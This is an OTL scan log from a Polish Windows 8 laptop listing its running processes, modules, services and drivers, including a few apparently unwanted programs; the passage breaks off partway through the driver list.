OTL logfile created on: 2014-06-04 11:49:11 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Marcin\Desktop 64bit- Professional (Version = 6.2.9200) - Type = NTWorkstation Internet Explorer (Version = 9.11.9600.17031) Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd 11,89 Gb Total Physical Memory | 8,20 Gb Available Physical Memory | 68,94% Memory free 13,70 Gb Paging File | 9,57 Gb Available in Paging File | 69,83% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86) Drive C: | 200,20 Gb Total Space | 75,11 Gb Free Space | 37,52% Space Free | Partition Type: NTFS Drive D: | 215,22 Gb Total Space | 98,67 Gb Free Space | 45,84% Space Free | Partition Type: NTFS Drive F: | 931,51 Gb Total Space | 612,31 Gb Free Space | 65,73% Space Free | Partition Type: NTFS Computer Name: LAPTOPIK | User Name: Marcin | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2014-06-04 11:41:33 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Marcin\Desktop\OTL.exe PRC - [2014-06-03 17:14:58 | 000,573,344 | ---- | M] (Fuyu LIMITED) -- C:\ProgramData\WindowsProtectManger\wprotectmanager.exe PRC - [2014-05-30 01:35:33 | 002,352,072 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe PRC - [2014-05-30 01:31:38 | 001,631,008 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe PRC - [2014-05-29 19:36:52 | 000,543,424 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe PRC - [2014-05-29 19:36:48 | 001,754,816 | ---- | M] (Valve Corporation) -- D:\Steam\Steam.exe PRC - [2014-05-26 15:27:12 | 003,888,648 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\avastui.exe PRC - [2014-05-26 15:26:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe PRC - [2014-05-08 12:52:32 | 000,704,112 | ---- | M] (Cherished Technololgy LIMITED) -- C:\ProgramData\IePluginServices\PluginService.exe PRC - [2014-04-02 03:58:05 | 000,841,032 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe PRC - [2014-03-29 14:57:59 | 000,076,352 | ---- | M] (GG Network S.A.) -- C:\Users\Marcin\AppData\Local\GG\Application\xulrunner\gghub.exe PRC - [2014-03-29 14:57:58 | 004,023,360 | ---- | M] (GG Network S.A.) -- C:\Users\Marcin\AppData\Local\GG\Application\gghub.exe PRC - [2014-03-29 14:57:57 | 000,132,672 | ---- | M] (GG Network S.A.) -- C:\Users\Marcin\AppData\Local\GG\Application\ggapp.exe PRC - [2014-03-11 13:08:25 | 005,222,976 | ---- | M] (GG Network S.A.) -- C:\Users\Marcin\AppData\Local\GG\Application\ggdrive\ggdrive.exe PRC - [2013-12-21 08:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe PRC - [2013-11-20 15:43:14 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe PRC - [2013-11-01 09:22:46 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe PRC - [2013-02-06 16:58:52 | 000,020,792 | ---- | M] (ASUSTeK Computer Inc.) -- C:\Program Files (x86)\ASUS\ASUS Smart Gesture\QuickGesture\x86\QuickGesture.exe PRC - [2012-10-26 15:35:44 | 000,184,704 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe PRC - [2012-10-17 20:08:40 | 000,205,184 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe PRC - [2012-10-05 16:55:50 | 000,110,976 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe PRC - [2012-09-14 14:14:16 | 000,328,064 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe PRC - [2012-08-31 20:27:20 | 000,590,208 | ---- | M] (ASUS) -- C:\Program Files (x86)\ASUS\ASUS InstantOn\InsOnWMI.exe PRC - [2012-07-19 16:07:51 | 000,821,840 | ---- | M] (ABBYY) -- C:\Program Files (x86)\Common Files\ABBYY\FineReader\11.00\Licensing\CE\NetworkLicenseServer.exe PRC - [2012-05-28 11:04:48 | 000,113,312 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe PRC - [2012-05-19 05:43:50 | 001,144,832 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Windows Sidebar\sidebar.exe PRC - [2012-04-24 15:37:56 | 000,169,752 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe PRC - [2012-04-13 11:14:00 | 000,277,120 | ---- | M] (ASUS) -- C:\Program Files (x86)\ASUS\ASUS InstantOn\InsOnSrv.exe PRC - [2011-11-21 15:19:50 | 000,096,896 | ---- | M] (ASUS) -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe PRC - [2010-02-12 04:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) -- C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2014-05-29 19:37:34 | 002,139,840 | ---- | M] () -- D:\Steam\video.dll MOD - [2014-05-29 19:36:54 | 001,116,864 | ---- | M] () -- D:\Steam\bin\chromehtml.dll MOD - [2014-05-29 19:36:54 | 000,131,264 | ---- | M] () -- D:\Steam\bin\audio.dll MOD - [2014-05-26 15:26:34 | 019,336,120 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\libcef.dll MOD - [2014-05-23 10:07:40 | 000,004,096 | ---- | M] () -- C:\Users\Marcin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\MonitorSystemu.Gadget\binaries\MonitorSystemu.Utils.dll MOD - [2014-05-20 04:44:03 | 000,012,120 | ---- | M] () -- C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll MOD - [2014-05-17 03:36:10 | 000,756,224 | ---- | M] () -- D:\Steam\SDL2.dll MOD - [2014-05-02 01:35:22 | 020,628,160 | ---- | M] () -- D:\Steam\bin\libcef.dll MOD - [2014-04-30 02:08:08 | 001,135,104 | ---- | M] () -- D:\Steam\libavcodec-55.dll MOD - [2014-04-30 02:08:08 | 000,471,552 | ---- | M] () -- D:\Steam\libavutil-53.dll MOD - [2014-04-30 02:08:08 | 000,404,992 | ---- | M] () -- D:\Steam\libavformat-55.dll MOD - [2014-04-30 02:08:08 | 000,340,992 | ---- | M] () -- D:\Steam\libavresample-1.dll MOD - [2014-04-29 02:37:22 | 000,519,168 | ---- | M] () -- D:\Steam\libswscale-2.dll MOD - [2014-04-02 03:58:03 | 000,390,472 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\ppGoogleNaClPluginChrome.dll MOD - [2014-04-02 03:57:59 | 004,081,480 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\pdf.dll MOD - [2014-04-02 03:57:54 | 000,674,632 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\libglesv2.dll MOD - [2014-04-02 03:57:53 | 000,093,000 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\libegl.dll MOD - [2014-04-02 03:57:52 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\ffmpegsumo.dll MOD - [2014-04-02 03:57:49 | 000,065,352 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\chrome_elf.dll MOD - [2014-03-29 14:58:01 | 003,205,184 | ---- | M] () -- C:\Users\Marcin\AppData\Local\GG\Application\xulrunner\mozjs.dll MOD - [2014-03-11 13:08:25 | 000,122,432 | ---- | M] () -- C:\Users\Marcin\AppData\Local\GG\Application\ggdrive\ZLIB1.dll MOD - [2014-02-18 21:32:22 | 000,065,776 | ---- | M] () -- C:\Program Files\TortoiseSVN\bin\TortoiseStub32.dll MOD - [2014-02-18 13:40:40 | 001,051,136 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Management\9f0fe59d471b42a6bbfe4ed1ca78aaa3\System.Management.ni.dll MOD - [2014-02-13 17:49:59 | 007,993,856 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\20af51394609c937507288c2b1cf2c8c\System.ni.dll MOD - [2014-02-13 17:49:55 | 011,499,520 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\3de119146ed0e59408f896aa69cdfc42\mscorlib.ni.dll MOD - [2013-11-04 12:29:46 | 016,166,248 | ---- | M] () -- C:\Users\Marcin\AppData\Local\GG\Application\FMSBWChecker\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll MOD - [2013-09-14 01:51:02 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll MOD - [2013-09-14 01:50:36 | 001,242,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll MOD - [2013-08-17 02:06:30 | 000,311,296 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_pl_b77a5c561934e089\mscorlib.resources.dll MOD - [2013-08-07 21:25:24 | 000,093,696 | ---- | M] () -- C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll MOD - [2013-06-15 01:49:16 | 000,153,088 | ---- | M] () -- D:\Steam\bin\mssvoice.asi MOD - [2013-06-15 01:49:16 | 000,071,680 | ---- | M] () -- D:\Steam\bin\mssmp3.asi MOD - [2013-06-15 01:49:12 | 001,100,800 | ---- | M] () -- D:\Steam\bin\avcodec-53.dll MOD - [2013-06-15 01:49:12 | 000,192,000 | ---- | M] () -- D:\Steam\bin\avformat-53.dll MOD - [2013-06-15 01:49:12 | 000,124,416 | ---- | M] () -- D:\Steam\bin\avutil-51.dll MOD - [2013-06-06 20:16:38 | 000,015,080 | ---- | M] () -- C:\Users\Marcin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\GetCoreTempInfoNET.dll MOD - [2013-06-06 20:16:38 | 000,014,056 | ---- | M] () -- C:\Users\Marcin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\SystemInfo.dll MOD - [2013-06-06 20:16:38 | 000,012,520 | ---- | M] () -- C:\Users\Marcin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\CoreTempReader.dll [color=#E56717]========== Services (SafeList) ==========[/color] SRV:[b]64bit:[/b] - [2014-05-30 01:28:54 | 021,055,432 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe -- (NvStreamSvc) SRV:[b]64bit:[/b] - [2014-05-26 15:26:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus) SRV:[b]64bit:[/b] - [2014-05-14 16:01:27 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService) SRV:[b]64bit:[/b] - [2014-05-14 16:01:20 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService) SRV:[b]64bit:[/b] - [2014-05-14 16:00:57 | 001,576,960 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc) SRV:[b]64bit:[/b] - [2014-05-14 16:00:33 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness) SRV:[b]64bit:[/b] - [2014-05-14 16:00:15 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure) SRV:[b]64bit:[/b] - [2014-05-14 15:59:42 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc) SRV:[b]64bit:[/b] - [2014-03-24 04:31:14 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc) SRV:[b]64bit:[/b] - [2014-03-24 04:31:14 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend) SRV:[b]64bit:[/b] - [2014-03-22 13:55:55 | 000,005,632 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe -- (c2wts) SRV:[b]64bit:[/b] - [2014-03-08 07:41:25 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc) SRV:[b]64bit:[/b] - [2014-03-06 09:02:13 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon) SRV:[b]64bit:[/b] - [2014-03-06 08:34:46 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder) SRV:[b]64bit:[/b] - [2014-03-04 08:25:12 | 013,392,384 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\vmms.exe -- (vmms) SRV:[b]64bit:[/b] - [2014-02-22 17:53:10 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService) SRV:[b]64bit:[/b] - [2014-02-22 11:57:16 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM) SRV:[b]64bit:[/b] - [2014-01-27 17:38:59 | 001,584,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc) SRV:[b]64bit:[/b] - [2013-11-23 06:50:00 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker) SRV:[b]64bit:[/b] - [2013-10-05 00:58:24 | 000,087,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe -- (VsEtwService120) SRV:[b]64bit:[/b] - [2013-08-31 12:00:10 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc) SRV:[b]64bit:[/b] - [2013-08-23 01:14:13 | 000,183,296 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt) SRV:[b]64bit:[/b] - [2013-08-23 01:14:13 | 000,090,464 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\KeyboardFilterSvc.dll -- (MsKeyboardFilter) SRV:[b]64bit:[/b] - [2013-08-22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify) SRV:[b]64bit:[/b] - [2013-08-22 13:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC) SRV:[b]64bit:[/b] - [2013-08-22 13:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS) SRV:[b]64bit:[/b] - [2013-08-22 13:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc) SRV:[b]64bit:[/b] - [2013-08-22 13:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc) SRV:[b]64bit:[/b] - [2013-08-22 13:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc) SRV:[b]64bit:[/b] - [2013-08-22 12:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface) SRV:[b]64bit:[/b] - [2013-08-22 12:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost) SRV:[b]64bit:[/b] - [2013-08-22 11:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum) SRV:[b]64bit:[/b] - [2013-08-22 11:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso) SRV:[b]64bit:[/b] - [2013-08-22 11:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker) SRV:[b]64bit:[/b] - [2013-08-22 11:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm) SRV:[b]64bit:[/b] - [2013-08-22 11:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService) SRV:[b]64bit:[/b] - [2013-08-22 11:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc) SRV:[b]64bit:[/b] - [2013-08-22 11:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc) SRV:[b]64bit:[/b] - [2013-08-22 11:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup) SRV:[b]64bit:[/b] - [2012-08-29 16:22:36 | 000,208,384 | ---- | M] (Atheros Commnucations) [Auto | Running] -- C:\Windows\SysNative\AdminService.exe -- (AtherosSvc) SRV:[b]64bit:[/b] - [2012-05-30 14:11:34 | 000,149,544 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TurboBoost\TurboBoost.exe -- (TurboBoost) SRV:[b]64bit:[/b] - [2008-07-29 14:20:28 | 004,737,024 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe -- (msvsmon90) SRV - [2014-06-03 17:14:58 | 000,573,344 | ---- | M] (Fuyu LIMITED) [Auto | Running] -- C:\ProgramData\WindowsProtectManger\wprotectmanager.exe -- (WindowsProtectManger) SRV - [2014-05-30 01:31:38 | 001,631,008 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe -- (NvNetworkService) SRV - [2014-05-29 19:36:52 | 000,543,424 | ---- | M] (Valve Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service) SRV - [2014-05-08 12:52:32 | 000,704,112 | ---- | M] (Cherished Technololgy LIMITED) [Auto | Running] -- C:\ProgramData\IePluginServices\PluginService.exe -- (IePluginServices) SRV - [2014-03-15 10:40:31 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance) SRV - [2013-12-21 08:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice) SRV - [2013-11-13 20:54:04 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe -- (Creative ALchemy AL6 Licensing Service) SRV - [2013-11-13 20:51:47 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe -- (Creative Audio Engine Licensing Service) SRV - [2013-10-23 09:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate) SRV - [2013-10-01 14:02:42 | 000,279,000 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs) SRV - [2013-08-31 11:25:30 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc) SRV - [2013-08-22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify) SRV - [2013-08-22 05:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc) SRV - [2013-08-22 05:21:36 | 000,119,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service) SRV - [2013-08-22 04:55:00 | 000,142,336 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe -- (fussvc) SRV - [2013-08-22 04:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost) SRV - [2012-10-05 16:55:50 | 000,110,976 | ---- | M] (ASUSTek Computer Inc.) [Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe -- (ASLDRService) SRV - [2012-09-13 05:59:08 | 002,466,448 | R--- | M] (Realsil Microelectronics Inc.) [Auto | Running] -- C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe -- (IconMan_R) SRV - [2012-07-19 16:07:51 | 000,821,840 | ---- | M] (ABBYY) [Auto | Running] -- C:\Program Files (x86)\Common Files\ABBYY\FineReader\11.00\Licensing\CE\NetworkLicenseServer.exe -- (ABBYY.Licensing.FineReader.Corporate.11.0) SRV - [2012-04-24 15:37:56 | 000,169,752 | ---- | M] (Intel Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe -- (ICCS) SRV - [2012-04-13 11:14:00 | 000,277,120 | ---- | M] (ASUS) [Auto | Running] -- C:\Program Files (x86)\ASUS\ASUS InstantOn\InsOnSrv.exe -- (ASUS InstantOn) SRV - [2011-11-21 15:19:50 | 000,096,896 | ---- | M] (ASUS) [Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe -- (ATKGFNEXSrv) SRV - [2011-09-19 16:59:40 | 000,278,336 | ---- | M] (NVIDIA) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe -- (nTuneService) SRV - [2010-02-12 04:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) [Auto | Running] -- C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe -- (CTAudSvcService) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV:[b]64bit:[/b] - [2014-05-30 01:28:53 | 000,020,256 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys -- (NvStreamKms) DRV:[b]64bit:[/b] - [2014-05-26 15:27:10 | 001,039,096 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx) DRV:[b]64bit:[/b] - [2014-05-26 15:27:10 | 000,423,240 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsp.sys -- (aswSP) DRV:[b]64bit:[/b] - [2014-05-26 15:27:10 | 000,085,328 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswstm.sys -- (aswStm) DRV:[b]64bit:[/b] - [2014-05-26 15:26:37 | 000,208,416 | ---- | M] () [Kernel | Boot | Running] -- C:\windows\SysNative\drivers\aswVmm.sys -- (aswVmm) DRV:[b]64bit:[/b] - [2014-05-26 15:26:37 | 000,093,568 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr) DRV:[b]64bit:[/b] - [2014-05-26 15:26:37 | 000,079,184 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt) DRV:[b]64bit:[/b] - [2014-05-26 15:26:37 | 000,065,776 | ---- | M] () [Kernel | Boot | Running] -- C:\windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt) DRV:[b]64bit:[/b] - [2014-05-26 15:26:37 | 000,029,208 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid) DRV:[b]64bit:[/b] - [2014-05-22 18:08:10 | 000,061,112 | ---- | M] (StdLib) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\{0c0bb4a8-45a4-4685-9c1d-08d98af4b926}w64.sys -- ({0c0bb4a8-45a4-4685-9c1d-08d98af4b926}w64) DRV:[b]64bit:[/b] - [2014-05-20 04:44:03 | 000,032,544 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\nvpciflt.sys -- (nvpciflt) DRV:[b]64bit:[/b] - [2014-05-14 16:00:51 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\windows\SysNative\drivers\refs.sys -- (ReFS) DRV:[b]64bit:[/b] - [2014-05-14 16:00:46 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000) DRV:[b]64bit:[/b] - [2014-05-14 16:00:45 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI) DRV:[b]64bit:[/b] - [2014-05-14 16:00:30 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender) DRV:[b]64bit:[/b] - [2014-05-14 16:00:26 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor) DRV:[b]64bit:[/b] - [2014-05-14 16:00:16 